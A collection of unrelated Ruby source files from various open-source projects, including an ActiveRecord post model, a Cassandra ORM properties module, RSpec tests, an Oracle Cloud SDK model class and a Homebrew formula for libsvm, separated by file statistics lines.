class Post < ActiveRecord::Base STATUSES = %w(active pending flagged deleted) has_many :notes, :order => "id desc" has_and_belongs_to_many :pools has_many :flags, :class_name => "PostFlag", :order => "flagged_post_details.id ASC" has_many :appeals, :class_name => "PostAppeal" belongs_to :user belongs_to :approver, :class_name => "User" attr_accessor :updater_ip_addr, :updater_user_id attr_protected :user_id, :score, :md5, :width, :height, :cached_tags, :fav_count, :file_ext, :has_children, :status, :sample_width, :sample_height, :change_seq, :approver_id, :tags_index, :ip_addr include PostMethods::SqlMethods include PostMethods::CommentMethods include PostMethods::ImageStoreMethods include PostMethods::VoteMethods include PostMethods::TagMethods include PostMethods::CountMethods include PostMethods::CacheMethods include PostMethods::ParentMethods include PostMethods::FileMethods include PostMethods::ChangeSequenceMethods include PostMethods::RatingMethods include PostMethods::StatusMethods include PostMethods::ApiMethods include PostMethods::ModerationMethods include PostMethods::DeletionMethods include PostMethods::FlagMethods # TODO: refactor or eliminate def favorited_by @favorited_by ||= User.find(:all, :joins => "JOIN favorites f ON f.user_id = users.id", :select => "users.name, users.id, users.created_at, users.level", :conditions => ["f.post_id = ?", id], :order => "f.id DESC") end def favorited_by_hash @favorited_by_hash ||= User.select_all_sql("SELECT users.name, users.id FROM users JOIN favorites f ON f.user_id = users.id WHERE f.post_id = #{id} ORDER BY f.id DESC") end def author return User.find_name(user_id) end def active_notes notes.select {|x| x.is_active?} end def active_notes_hash @active_notes_hash ||= Note.select_all_sql("SELECT * FROM notes WHERE post_id = #{id} AND is_active = TRUE") end def can_be_seen_by?(user) CONFIG["can_see_post"].call(user, self) end def normalized_source if source =~ /pixiv\.net\/img\// img_id = source[/(\d+)(_s|_m|(_big)?_p\d+)?\.[\w\?]+\s*$/, 1] if $2 =~ /_p/ "http://www.pixiv.net/member_illust.php?mode=manga&illust_id=#{img_id}" else "http://www.pixiv.net/member_illust.php?mode=medium&illust_id=#{img_id}" end else source end end end
34.84058
218
0.71381
ff107c61f282111295938a7f2b9248749362baf3
10,437
module Cequel module Record # # Properties on a Cequel record acts as attributes on record instances, and # are persisted as column values to Cassandra. Properties are declared # explicitly on a record instance in the body. # # Properties can be **key columns**, **data columns**, or **collection # columns**. Key columns combine to form the primary key for the record; # they cannot be changed once a record has been saved. Data columns contain # scalar data values like strings, integers, and timestamps. Collection # columns are lists, sets, or maps that can be atomically updated. # # All varieties of column have a type; see {Cequel::Type} for the full # list of possibilities. A collection column's type is the type of its # elements (in the case of a map collection, there is both a key type and a # value type). # # @example # class Post # key :blog_subdomain, :text # key :id, :timeuuid, auto: true # # column :title, :text # column :body, :text # column :updated_at, :timestamp # # list :categories, :text # set :tags, :text # map :referers, :text, :integer # end # # @see ClassMethods Methods for defining properties # module Properties extend ActiveSupport::Concern included do class_attribute :default_attributes, :instance_writer => false self.default_attributes = {} class <<self; alias_method :new_empty, :new; end extend ConstructorMethods attr_reader :collection_proxies private :collection_proxies end # @private module ConstructorMethods def new(*args, &block) new_empty.tap do |record| record.__send__(:initialize_new_record, *args) yield record if block_given? end end end # # Methods for defining columns on a record # # @see Properties # module ClassMethods protected # @!visibility public # # Define a key column. By default, the first key column defined for a # record will be a partition key, and the following keys will be # clustering columns. This behavior can be changed using the # `:partition` option # # @param name [Symbol] the name of the key column # @param type [Symbol] the type of the key column # @param options [Options] options for the key column # @option options [Boolean] :partition (false) make this a partition key # even if it is not the first key column # @option options [Boolean] :auto (false) automatically initialize this # key with a UUID value for new records. Only valid for `uuid` and # `timeuuid` columns. # @return [void] # # @note {Associations::ClassMethods#belongs_to belongs_to} implicitly # defines key columns. # # @see # http://www.datastax.com/documentation/cql/3.0/webhelp/index.html#cql/ddl/ddl_anatomy_table_c.html#concept_ds_cz4_lmy_zj # CQL documentation on compound primary keys # def key(name, type, options = {}) def_accessors(name) if options.fetch(:auto, false) unless Type[type].is_a?(Cequel::Type::Uuid) raise ArgumentError, ":auto option only valid for UUID columns" end default = -> { CassandraCQL::UUID.new } if options.fetch(:auto, false) end set_attribute_default(name, default) end # # Define a data column # # @param name [Symbol] the name of the column # @param type [Symbol] the type of the column # @param options [Options] options for the column # @option options [Object,Proc] :default a default value for the column, # or a proc that returns a default value for the column # @return [void] # def column(name, type, options = {}) def_accessors(name) set_attribute_default(name, options[:default]) end # # Define a list column # # @param name [Symbol] the name of the list # @param type [Symbol] the type of the elements in the list # @param options [Options] options for the list # @option options [Object,Proc] :default ([]) a default value for the column, # or a proc that returns a default value for the column # @return [void] # # @see Record::List # @since 1.0.0 # def list(name, type, options = {}) def_collection_accessors(name, List) set_attribute_default(name, options.fetch(:default, [])) end # # Define a set column # # @param name [Symbol] the name of the set # @param type [Symbol] the type of the elements in the set # @param options [Options] options for the set # @option options [Object,Proc] :default (Set[]) a default value for the column, # or a proc that returns a default value for the column # @return [void] # # @see Record::Set # @since 1.0.0 # def set(name, type, options = {}) def_collection_accessors(name, Set) set_attribute_default(name, options.fetch(:default, ::Set[])) end # # Define a map column # # @param name [Symbol] the name of the map # @param key_type [Symbol] the type of the keys in the set # @param options [Options] options for the set # @option options [Object,Proc] :default ({}) a default value for the column, # or a proc that returns a default value for the column # @return [void] # # @see Record::Map # @since 1.0.0 # def map(name, key_type, value_type, options = {}) def_collection_accessors(name, Map) set_attribute_default(name, options.fetch(:default, {})) end private def def_accessors(name) name = name.to_sym def_reader(name) def_writer(name) end def def_reader(name) module_eval <<-RUBY, __FILE__, __LINE__+1 def #{name}; read_attribute(#{name.inspect}); end RUBY end def def_writer(name) module_eval <<-RUBY, __FILE__, __LINE__+1 def #{name}=(value); write_attribute(#{name.inspect}, value); end RUBY end def def_collection_accessors(name, collection_proxy_class) def_collection_reader(name, collection_proxy_class) def_collection_writer(name) end def def_collection_reader(name, collection_proxy_class) module_eval <<-RUBY, __FILE__, __LINE__+1 def #{name} proxy_collection(#{name.inspect}, #{collection_proxy_class}) end RUBY end def def_collection_writer(name) module_eval <<-RUBY, __FILE__, __LINE__+1 def #{name}=(value) reset_collection_proxy(#{name.inspect}) write_attribute(#{name.inspect}, value) end RUBY end def set_attribute_default(name, default) default_attributes[name.to_sym] = default end end # @private def initialize(attributes = {}, record_collection = nil) @attributes, @record_collection = attributes, record_collection @collection_proxies = {} end # # @return [Array<Symbol>] list of names of attributes on this record # def attribute_names @attributes.keys end # # @return [Hash<Symbol,Object>] map of column names to values currently # set on this record # def attributes attribute_names.each_with_object({}) do |name, attributes| attributes[name] = read_attribute(name) end end # # Set attributes on the record. Each attribute is set via the setter # method; virtual (non-column) attributes are allowed. # # @param attributes [Hash] map of attribute names to values # @return [void] # def attributes=(attributes) attributes.each_pair do |attribute, value| __send__(:"#{attribute}=", value) end end # # @return [Boolean] true if this record has the same type and key # attributes as the other record def ==(other) if key_values.any? { |value| value.nil? } super else self.class == other.class && key_values == other.key_values end end # # @return [String] string representation of the record # def inspect inspected_attributes = attributes.each_pair.map do |attr, value| inspected_value = value.is_a?(CassandraCQL::UUID) ? value.to_guid : value.inspect "#{attr}: #{inspected_value}" end "#<#{self.class} #{inspected_attributes.join(", ")}>" end protected def read_attribute(name) @attributes.fetch(name) rescue KeyError if self.class.reflect_on_column(name) raise MissingAttributeError, "missing attribute: #{name}" else raise UnknownAttributeError, "unknown attribute: #{name}" end end def write_attribute(name, value) @attributes[name] = value end private def proxy_collection(column_name, proxy_class) column = self.class.reflect_on_column(column_name) collection_proxies[column_name] ||= proxy_class.new(self, column) end def reset_collection_proxy(name) collection_proxies.delete(name) end def initialize_new_record(attributes = {}) dynamic_defaults = default_attributes. select { |name, value| value.is_a?(Proc) } @attributes = Marshal.load(Marshal.dump( default_attributes.except(*dynamic_defaults.keys))) dynamic_defaults.each { |name, p| @attributes[name] = p.() } @new_record = true yield self if block_given? self.attributes = attributes loaded! self end end end end
32.212963
131
0.590974
ff9ea83f914858b9ba6d1d5ee83fabca8b2d8e5c
954
require_relative 'array_list' describe ArrayList do # describe '#initialize' do # let(:array) { ArrayList.new(FixedArray.new) } # it 'creates a new ArrayList' do # expect(array.array).to be_a(FixedArray) # end # end describe '#add' do let(:array) { ArrayList.new(FixedArray.new) } it 'will add an element to the fixed array' do expect(array.add('yes')).to eq('yes') end end describe '#get' do let(:array) { ArrayList.new(FixedArray.new) } it 'will retrieve an element from a given index' do expect(array.get(0)).to eq(nil) end end describe '#set' do let(:array) { ArrayList.new(FixedArray.new) } it 'will set and element at a given index' do expect(array.set(0, 'no')).to eq('no') end end describe '#size' do let(:array) { ArrayList.new(FixedArray.new) } it 'will show the length of the array' do expect(array.size).to eq(4) end end end
23.268293
55
0.629979
1d860a608deeef93ea2465af424921fea1dba78a
1,932
class StopAreaReferentialSync < ApplicationModel include SyncSupport include AASM belongs_to :stop_area_referential has_many :stop_area_referential_sync_messages, :dependent => :destroy after_commit :perform_sync, :on => :create validate :multiple_process_validation, :on => :create scope :pending, -> { where(status: [:new, :pending]) } alias_method :referential, :stop_area_referential private def perform_sync create_sync_message :info, :new StopAreaReferentialSyncWorker.perform_async_or_fail(self) do log_failed({}) end end # There can be only one instance running def multiple_process_validation if self.class.where(status: [:new, :pending], stop_area_referential_id: stop_area_referential_id).count > 0 errors.add(:base, :multiple_process) end end aasm column: :status do state :new, :initial => true state :pending state :successful state :failed event :run, after: :log_pending do transitions :from => :new, :to => :pending end event :successful, after: :log_successful do transitions :from => [:pending, :failed], :to => :successful end event :failed, after: :log_failed do transitions :from => [:new, :pending], :to => :failed end end def create_sync_message criticity, key, message_attributes = {} params = { criticity: criticity, message_key: key, message_attributes: message_attributes } stop_area_referential_sync_messages.create params end def log_pending update_attribute(:started_at, Time.now) create_sync_message :info, :pending end def log_successful message_attributes update_attribute(:ended_at, Time.now) create_sync_message :info, :successful, message_attributes end def log_failed message_attributes update_attribute(:ended_at, Time.now) create_sync_message :error, :failed, message_attributes end end
26.833333
111
0.717909
391ecaa3de2220f6a668021f33d779dcc8b082b0
1,267
#- Copyright © 2008-2011 8th Light, Inc. All Rights Reserved. #- Limelight and all included source files are distributed under terms of the MIT License. require File.expand_path(File.dirname(__FILE__) + "/../spec_helper") require 'limelight/string' describe String do it "should convert into camel case" do "class_name".camelized.should == "ClassName" "once_upon_a_time".camelized.should == "OnceUponATime" "with spaces".camelized.should == "WithSpaces" end it "should convert into camel case" do "class_name".camelized(:lower).should == "className" "once_upon_a_time".camelized(:lower).should == "onceUponATime" "with spaces".camelized(:lower).should == "withSpaces" end it "should underscore a name" do "ClassName".underscored.should == "class_name" "OneTwoThree".underscored.should == "one_two_three" "One".underscored.should == "one" end it "should convert a string to title" do "class_name".titleized.should == "Class Name" "once_upon_a_time".titleized.should == "Once Upon A Time" "AbC_eFg_hiJ".titleized.should == "Ab C E Fg Hi J" "with spaces".titleized.should == "With Spaces" "Some Title".titleized.should == "Some Title" "SomeTitle".titleized.should == "Some Title" end end
35.194444
90
0.705604
39a8bdc69b76eb9aeecb4c3e32a3e09d6a2eb4ee
7,294
require 'digest/md5' module SpreeMigrateDB MappingItem = Struct.new(:current, :export, :options) do def actions @actions = [] end def action :unknown end def as_question "#{export} -> #{current} :: #{action}" end def question_opts actions end def save_action(action) return if action == :default || action == false @action = actions.detect{ |a| a.to_s[0].upcase == action } UI.say "Changed action to #{@action}." end end TableMappingItem = Class.new(MappingItem) do def type :table end def canonical_table_name @c_table_name ||= begin t = options.fetch(:canonical) { export.name } t = export.name if t == :not_canonical t end end def actions @actions = [ :create, :rename, :skip ] end def <=>(other) "#{export.name}" <=> "#{other.export.name}" end def action return @action if @action if current.name == :not_canonical :create else :skip end end end IndexMappingItem = Class.new(MappingItem) do def type :index end def canonical_table_name @c_table_name ||= options.fetch(:canonical_table_name) { export.table } end def actions @actions = [ :create, :recreate, :skip ] end def <=>(other) "#{export.table}#{export.name}" <=> "#{other.export.table}#{other.export.name}" end def action return @action if @action if current == :not_canonical || current == :not_found :create elsif options[:missing] && options[:new] && options[:missing].empty? && options[:new].empty? :skip elsif ! options.empty? :recreate else :skip end end end FieldMappingItem = Class.new(MappingItem) do def type; :field; end def as_question if (options && options.empty?) || options.nil? opts = "" else opts = "" options.each_pair do |k,v| opts << "\n -- #{k}: '#{v}'" end opts << "\n" end "#{export} -> #{current} :: #{action}#{opts}" end def actions @actions = [ :create, :skip, :update ] end def <=>(other) "#{self.export}#{self.current}" <=> "#{other.export}#{other.current}" end def action return @action if @action if current == :no_table :skip elsif current == :no_field :create elsif current == export && ! options.empty? :update else :skip end end end class SchemaDefinitionDiff attr_accessor :mapping_dir attr_reader :mapping def initialize(current_schema, other_schema) @current_schema = current_schema @other_schema = other_schema @mapping_dir = "" @mapping = build_initial_mapping end def has_saved_mapping? File.exist? saved_mapping_file end def saved_mapping_file @saved_mapping_file ||= File.join(@mapping_dir, "mapping-#{diff_id}.map") end def load_mapping_from_file json_mapping = File.read(saved_mapping_file) @mapping = JSON.parse(json_mapping) end def save_mapping File.open saved_mapping_file, "w" do |f| f.write @mapping.to_json end end def identical? current_checksum == other_checksum end def diff_id "#{current_checksum}-#{other_checksum}" end private def current_checksum @current_checksum ||= checksum(@current_schema) end def other_checksum @other_checksum ||= checksum(@other_schema) end def checksum(schema) # WARNING: This will not work with ruby 1.8.x because order of hash keys isn't guaranteed. d = Digest::MD5.hexdigest schema.to_hash.to_s d.first(6) # don't need the whole thing end def build_initial_mapping m = { :tables => [], :indexes => [], :fields => [] } return m if identical? m[:tables] = table_mappings m[:indexes] = index_mappings m[:fields] = field_mappings m end def table_mappings return @table_mapping if @table_mapping mapping = [] @other_schema.table_defs.each do |t| canonical_name = canonical_lookup.canonical_table_name(t.name) current_table = @current_schema.lookup_table(canonical_name) mapping << TableMappingItem.new(current_table, t, {:canonical => canonical_name}) end @table_mapping = mapping end def index_mappings mapping = [] @other_schema.indexes.each do |i| table_name = canonical_lookup.canonical_table_name(i.table) if table_name == :not_canonical mapping << IndexMappingItem.new(table_name, i, {}) else mapping << unmatched_index_items(table_name, i) end end mapping.flatten end def field_mappings mapping = [] table_mappings.each do |tm| next if tm.action == :create current_fields = canonical_lookup.canonical_fields(tm.current).simplify_elements other_fields = canonical_lookup.canonical_fields(tm.export).simplify_elements missing, new, same, all = compare_arrays(current_fields, other_fields) missing.each do |m| # compare the options el1, el2 = all.select{|el| el.to_s == m.to_s} if el2 new_opts = el1.options.merge el2.options export = m else new_opts = {} export = :default end mapping << FieldMappingItem.new(m, export, new_opts) end new.each do |d| el1, el2 = all.select{|el| el.to_s == d.to_s} mapping << FieldMappingItem.new(:no_field, d) unless el2 end same.each do |s| mapping << FieldMappingItem.new(s, s, {}) end end mapping end def compare_arrays(arr1, arr2) missing = arr1 - arr2 new = arr2 - arr1 same = arr1 & arr2 all = arr1 | arr2 [missing, new, same, all] end def canonical_lookup @canonical_lookup ||= CanonicalSpree::Lookup.new(@current_schema.spree_version) end def index_lookup_for_table(table_name) @current_schema.indexes.select {|i| i.table.to_s == table_name.to_s} end def unmatched_index_items(table_name, i) indexes_for_current_table = index_lookup_for_table(table_name) indexes_with_same_fields = indexes_for_current_table.select do |ci| missing, new, same = compare_arrays(ci.fields, i.fields) ! same.empty? end unmatched = [] if indexes_with_same_fields.empty? unmatched << IndexMappingItem.new(:not_found, i, {:canonical_table_name => table_name}) else indexes_with_same_fields.each do |ci| missing, new, same = compare_arrays(ci.fields, i.fields) unmatched << IndexMappingItem.new(ci, i, { :canonical_table_name => table_name, :missing => missing, :new => new }) end end unmatched end end end
23.155556
98
0.585001
e8e41b223042da5cee2b028de5d1ea13d0d1b91a
1,231
require './mathlibs/discrete_math' # Using rules derived from Chinese Remainder Theorom, Solve a System of congruences # See, Chinese Remainder Theorem section 3.7 Rosen. puts "\nHow many congruencies of a system?\n" number_of_congruencies = gets.to_i i=0 systems = Array.new product_of_m = 1 while number_of_congruencies > i # get each b and m for the form x == b (mod m) puts "Wht is the integer b : x == b(mod m)?\n" b = gets.to_i puts "Wht is the integer m : x == #{b}(mod m)?\n" m = gets.to_i product_of_m *=m congruence = Congruence.new(b, m) systems.push(congruence) i+=1 end # TODO: need ot check if all m are relativily prime # Perform a simultaneous solution discMath = DiscreteMath.new() steps = Array.new step_count = 1 x = 0 systems.each do |c| s, t = discMath.extended_gcd(product_of_m/c.m, c.m) k = 1 while s < 0 s = s + (c.m * k) k += 1 end step = SolutionStep.new(product_of_m/c.m, s, c.b) steps.push(step) puts "step#{step_count}: m is #{product_of_m/c.m}, s is #{s}, a is #{c.b}\n" step_count += 1 x += step.product end b = x % product_of_m puts "\n#{x} == b (mod #{product_of_m})\n" puts "Therefore, #{b} + #{product_of_m}*k = x, where k is any integer."
24.62
83
0.660439
f75eaea655aaeff84947ba26fe93401d4e7a9d23
379
module Minicoin module SyncedFolderSSHFS class Plugin < Vagrant.plugin("2") name "SSHFS syncing for darwin guests as a shared_folders plugin" synced_folder(:sshfs) do # default priority, but only usable where native isn't require_relative "synced_folder.rb" SyncedFolder end end end end
31.583333
91
0.617414
4a7ab46db9e83616b3c967f4cda867f38622f5c3
14,121
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved. # This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license. require 'date' require 'logger' # rubocop:disable Lint/UnneededCopDisableDirective, Metrics/LineLength module OCI # Summary of a Data Safe private endpoint. class DataSafe::Models::DataSafePrivateEndpointSummary LIFECYCLE_STATE_ENUM = [ LIFECYCLE_STATE_CREATING = 'CREATING'.freeze, LIFECYCLE_STATE_UPDATING = 'UPDATING'.freeze, LIFECYCLE_STATE_ACTIVE = 'ACTIVE'.freeze, LIFECYCLE_STATE_DELETING = 'DELETING'.freeze, LIFECYCLE_STATE_DELETED = 'DELETED'.freeze, LIFECYCLE_STATE_FAILED = 'FAILED'.freeze, LIFECYCLE_STATE_NA = 'NA'.freeze, LIFECYCLE_STATE_UNKNOWN_ENUM_VALUE = 'UNKNOWN_ENUM_VALUE'.freeze ].freeze # **[Required]** The OCID of the Data Safe private endpoint. # @return [String] attr_accessor :id # **[Required]** The display name of the private endpoint. # @return [String] attr_accessor :display_name # **[Required]** The OCID of the compartment. # @return [String] attr_accessor :compartment_id # **[Required]** The OCID of the VCN. # @return [String] attr_accessor :vcn_id # **[Required]** The OCID of the subnet. # @return [String] attr_accessor :subnet_id # **[Required]** The OCID of the private endpoint. # @return [String] attr_accessor :private_endpoint_id # The description of the private endpoint. # @return [String] attr_accessor :description # The date and time the private endpoint was created, in the format defined by [RFC3339](https://tools.ietf.org/html/rfc3339). # @return [DateTime] attr_accessor :time_created # The current state of the private endpoint. # @return [String] attr_reader :lifecycle_state # Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm) # # Example: `{\"Department\": \"Finance\"}` # # @return [Hash<String, String>] attr_accessor :freeform_tags # Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm) # # Example: `{\"Operations\": {\"CostCenter\": \"42\"}}` # # @return [Hash<String, Hash<String, Object>>] attr_accessor :defined_tags # System tags for this resource. Each key is predefined and scoped to a namespace. For more information, see Resource Tags. # Example: `{\"orcl-cloud\": {\"free-tier-retained\": \"true\"}}` # # @return [Hash<String, Hash<String, Object>>] attr_accessor :system_tags # Attribute mapping from ruby-style variable name to JSON key. def self.attribute_map { # rubocop:disable Style/SymbolLiteral 'id': :'id', 'display_name': :'displayName', 'compartment_id': :'compartmentId', 'vcn_id': :'vcnId', 'subnet_id': :'subnetId', 'private_endpoint_id': :'privateEndpointId', 'description': :'description', 'time_created': :'timeCreated', 'lifecycle_state': :'lifecycleState', 'freeform_tags': :'freeformTags', 'defined_tags': :'definedTags', 'system_tags': :'systemTags' # rubocop:enable Style/SymbolLiteral } end # Attribute type mapping. def self.swagger_types { # rubocop:disable Style/SymbolLiteral 'id': :'String', 'display_name': :'String', 'compartment_id': :'String', 'vcn_id': :'String', 'subnet_id': :'String', 'private_endpoint_id': :'String', 'description': :'String', 'time_created': :'DateTime', 'lifecycle_state': :'String', 'freeform_tags': :'Hash<String, String>', 'defined_tags': :'Hash<String, Hash<String, Object>>', 'system_tags': :'Hash<String, Hash<String, Object>>' # rubocop:enable Style/SymbolLiteral } end # rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity # rubocop:disable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral # Initializes the object # @param [Hash] attributes Model attributes in the form of hash # @option attributes [String] :id The value to assign to the {#id} property # @option attributes [String] :display_name The value to assign to the {#display_name} property # @option attributes [String] :compartment_id The value to assign to the {#compartment_id} property # @option attributes [String] :vcn_id The value to assign to the {#vcn_id} property # @option attributes [String] :subnet_id The value to assign to the {#subnet_id} property # @option attributes [String] :private_endpoint_id The value to assign to the {#private_endpoint_id} property # @option attributes [String] :description The value to assign to the {#description} property # @option attributes [DateTime] :time_created The value to assign to the {#time_created} property # @option attributes [String] :lifecycle_state The value to assign to the {#lifecycle_state} property # @option attributes [Hash<String, String>] :freeform_tags The value to assign to the {#freeform_tags} property # @option attributes [Hash<String, Hash<String, Object>>] :defined_tags The value to assign to the {#defined_tags} property # @option attributes [Hash<String, Hash<String, Object>>] :system_tags The value to assign to the {#system_tags} property def initialize(attributes = {}) return unless attributes.is_a?(Hash) # convert string to symbol for hash key attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v } self.id = attributes[:'id'] if attributes[:'id'] self.display_name = attributes[:'displayName'] if attributes[:'displayName'] raise 'You cannot provide both :displayName and :display_name' if attributes.key?(:'displayName') && attributes.key?(:'display_name') self.display_name = attributes[:'display_name'] if attributes[:'display_name'] self.compartment_id = attributes[:'compartmentId'] if attributes[:'compartmentId'] raise 'You cannot provide both :compartmentId and :compartment_id' if attributes.key?(:'compartmentId') && attributes.key?(:'compartment_id') self.compartment_id = attributes[:'compartment_id'] if attributes[:'compartment_id'] self.vcn_id = attributes[:'vcnId'] if attributes[:'vcnId'] raise 'You cannot provide both :vcnId and :vcn_id' if attributes.key?(:'vcnId') && attributes.key?(:'vcn_id') self.vcn_id = attributes[:'vcn_id'] if attributes[:'vcn_id'] self.subnet_id = attributes[:'subnetId'] if attributes[:'subnetId'] raise 'You cannot provide both :subnetId and :subnet_id' if attributes.key?(:'subnetId') && attributes.key?(:'subnet_id') self.subnet_id = attributes[:'subnet_id'] if attributes[:'subnet_id'] self.private_endpoint_id = attributes[:'privateEndpointId'] if attributes[:'privateEndpointId'] raise 'You cannot provide both :privateEndpointId and :private_endpoint_id' if attributes.key?(:'privateEndpointId') && attributes.key?(:'private_endpoint_id') self.private_endpoint_id = attributes[:'private_endpoint_id'] if attributes[:'private_endpoint_id'] self.description = attributes[:'description'] if attributes[:'description'] self.time_created = attributes[:'timeCreated'] if attributes[:'timeCreated'] raise 'You cannot provide both :timeCreated and :time_created' if attributes.key?(:'timeCreated') && attributes.key?(:'time_created') self.time_created = attributes[:'time_created'] if attributes[:'time_created'] self.lifecycle_state = attributes[:'lifecycleState'] if attributes[:'lifecycleState'] raise 'You cannot provide both :lifecycleState and :lifecycle_state' if attributes.key?(:'lifecycleState') && attributes.key?(:'lifecycle_state') self.lifecycle_state = attributes[:'lifecycle_state'] if attributes[:'lifecycle_state'] self.freeform_tags = attributes[:'freeformTags'] if attributes[:'freeformTags'] raise 'You cannot provide both :freeformTags and :freeform_tags' if attributes.key?(:'freeformTags') && attributes.key?(:'freeform_tags') self.freeform_tags = attributes[:'freeform_tags'] if attributes[:'freeform_tags'] self.defined_tags = attributes[:'definedTags'] if attributes[:'definedTags'] raise 'You cannot provide both :definedTags and :defined_tags' if attributes.key?(:'definedTags') && attributes.key?(:'defined_tags') self.defined_tags = attributes[:'defined_tags'] if attributes[:'defined_tags'] self.system_tags = attributes[:'systemTags'] if attributes[:'systemTags'] raise 'You cannot provide both :systemTags and :system_tags' if attributes.key?(:'systemTags') && attributes.key?(:'system_tags') self.system_tags = attributes[:'system_tags'] if attributes[:'system_tags'] end # rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity # rubocop:enable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral # Custom attribute writer method checking allowed values (enum). # @param [Object] lifecycle_state Object to be assigned def lifecycle_state=(lifecycle_state) # rubocop:disable Style/ConditionalAssignment if lifecycle_state && !LIFECYCLE_STATE_ENUM.include?(lifecycle_state) OCI.logger.debug("Unknown value for 'lifecycle_state' [" + lifecycle_state + "]. Mapping to 'LIFECYCLE_STATE_UNKNOWN_ENUM_VALUE'") if OCI.logger @lifecycle_state = LIFECYCLE_STATE_UNKNOWN_ENUM_VALUE else @lifecycle_state = lifecycle_state end # rubocop:enable Style/ConditionalAssignment end # rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines # Checks equality by comparing each attribute. # @param [Object] other the other object to be compared def ==(other) return true if equal?(other) self.class == other.class && id == other.id && display_name == other.display_name && compartment_id == other.compartment_id && vcn_id == other.vcn_id && subnet_id == other.subnet_id && private_endpoint_id == other.private_endpoint_id && description == other.description && time_created == other.time_created && lifecycle_state == other.lifecycle_state && freeform_tags == other.freeform_tags && defined_tags == other.defined_tags && system_tags == other.system_tags end # rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines # @see the `==` method # @param [Object] other the other object to be compared def eql?(other) self == other end # rubocop:disable Metrics/AbcSize, Layout/EmptyLines # Calculates hash code according to all attributes. # @return [Fixnum] Hash code def hash [id, display_name, compartment_id, vcn_id, subnet_id, private_endpoint_id, description, time_created, lifecycle_state, freeform_tags, defined_tags, system_tags].hash end # rubocop:enable Metrics/AbcSize, Layout/EmptyLines # rubocop:disable Metrics/AbcSize, Layout/EmptyLines # Builds the object from hash # @param [Hash] attributes Model attributes in the form of hash # @return [Object] Returns the model itself def build_from_hash(attributes) return nil unless attributes.is_a?(Hash) self.class.swagger_types.each_pair do |key, type| if type =~ /^Array<(.*)>/i # check to ensure the input is an array given that the the attribute # is documented as an array but the input is not if attributes[self.class.attribute_map[key]].is_a?(Array) public_method("#{key}=").call( attributes[self.class.attribute_map[key]] .map { |v| OCI::Internal::Util.convert_to_type(Regexp.last_match(1), v) } ) end elsif !attributes[self.class.attribute_map[key]].nil? public_method("#{key}=").call( OCI::Internal::Util.convert_to_type(type, attributes[self.class.attribute_map[key]]) ) end # or else data not found in attributes(hash), not an issue as the data can be optional end self end # rubocop:enable Metrics/AbcSize, Layout/EmptyLines # Returns the string representation of the object # @return [String] String presentation of the object def to_s to_hash.to_s end # Returns the object in the form of hash # @return [Hash] Returns the object in the form of hash def to_hash hash = {} self.class.attribute_map.each_pair do |attr, param| value = public_method(attr).call next if value.nil? && !instance_variable_defined?("@#{attr}") hash[param] = _to_hash(value) end hash end private # Outputs non-array value in the form of hash # For object, use to_hash. Otherwise, just return the value # @param [Object] value Any valid value # @return [Hash] Returns the value in the form of hash def _to_hash(value) if value.is_a?(Array) value.compact.map { |v| _to_hash(v) } elsif value.is_a?(Hash) {}.tap do |hash| value.each { |k, v| hash[k] = _to_hash(v) } end elsif value.respond_to? :to_hash value.to_hash else value end end end end # rubocop:enable Lint/UnneededCopDisableDirective, Metrics/LineLength
42.278443
245
0.685858
abffb265a89e0399aaacf98c4e346e6f1d33034e
1,481
class Libsvm < Formula desc "Library for support vector machines" homepage "https://www.csie.ntu.edu.tw/~cjlin/libsvm/" url "https://www.csie.ntu.edu.tw/~cjlin/libsvm/libsvm-3.20.tar.gz" sha256 "0f122480bef44dec4df6dae056f468c208e4e08c00771ec1b6dae2707fd945be" bottle do cellar :any sha1 "9a87d885fd4d943448c9107fe572ed0b5687bf5b" => :yosemite sha1 "8fcd71c75841c4def48a4f57312ab5aae4ee628e" => :mavericks sha1 "90e7456fa54524a2a12f563ae3e9bcab57d6ade7" => :mountain_lion end def install system "make", "CFLAGS=#{ENV.cflags}" system "make", "lib" bin.install "svm-scale", "svm-train", "svm-predict" lib.install "libsvm.so.2" => "libsvm.2.dylib" lib.install_symlink "libsvm.2.dylib" => "libsvm.dylib" system "install_name_tool", "-id", "#{lib}/libsvm.2.dylib", "#{lib}/libsvm.2.dylib" include.install "svm.h" end test do (testpath/"train_classification.txt").write <<-EOS.undent +1 201:1.2 3148:1.8 3983:1 4882:1 -1 874:0.3 3652:1.1 3963:1 6179:1 +1 1168:1.2 3318:1.2 3938:1.8 4481:1 +1 350:1 3082:1.5 3965:1 6122:0.2 -1 99:1 3057:1 3957:1 5838:0.3 EOS (testpath/"train_regression.txt").write <<-EOS.undent 0.23 201:1.2 3148:1.8 3983:1 4882:1 0.33 874:0.3 3652:1.1 3963:1 6179:1 -0.12 1168:1.2 3318:1.2 3938:1.8 4481:1 EOS system "#{bin}/svm-train", "-s", "0", "train_classification.txt" system "#{bin}/svm-train", "-s", "3", "train_regression.txt" end end
34.44186
87
0.669818
2815e840c88ec1e43eae8e92432f8d824d39dde6
4,277
